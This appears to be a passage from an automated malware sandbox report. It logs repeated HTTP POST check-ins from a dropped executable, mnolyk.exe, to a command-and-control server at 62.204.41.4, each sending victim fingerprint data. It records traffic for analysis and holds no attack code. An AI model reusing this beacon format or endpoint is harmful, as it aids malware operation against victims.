                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:47.911786079 CET864INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      405192.168.2.75013362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:48.134150982 CET865OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:48.200330019 CET865INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      406192.168.2.75013462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:48.466411114 CET866OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:48.530484915 CET866INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      407192.168.2.75013562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:49.197725058 CET867OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:49.261332989 CET867INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      408192.168.2.75013662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:49.465984106 CET868OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:49.531065941 CET868INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      409192.168.2.75013762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:50.172257900 CET869OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:50.237481117 CET869INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      41192.168.2.74976562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:07.550648928 CET472OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:07.616096973 CET473INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      410192.168.2.75013862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:50.675317049 CET870OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:50.741820097 CET870INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      411192.168.2.75013962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:50.922595024 CET871OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:50.985634089 CET871INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      412192.168.2.75014062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:51.157274961 CET872OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:51.222137928 CET872INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      413192.168.2.75014162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:51.394661903 CET873OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:51.458302975 CET873INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      414192.168.2.75014262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:51.625961065 CET874OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:51.692059994 CET874INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      415192.168.2.75014362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:51.857942104 CET875OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:51.922130108 CET875INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      416192.168.2.75014462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:52.098501921 CET876OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:52.165503025 CET876INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      417192.168.2.75014562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:52.348177910 CET877OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:52.411082983 CET877INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      418192.168.2.75014662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:52.585656881 CET878OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:52.649820089 CET878INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      419192.168.2.75014762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:52.828887939 CET879OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:52.894197941 CET879INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      42192.168.2.74976662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:07.787301064 CET474OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:07.852941990 CET474INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      420192.168.2.75014862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:53.070955992 CET880OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:53.137356997 CET880INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      421192.168.2.75014962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:53.313477039 CET881OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:53.377768040 CET881INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
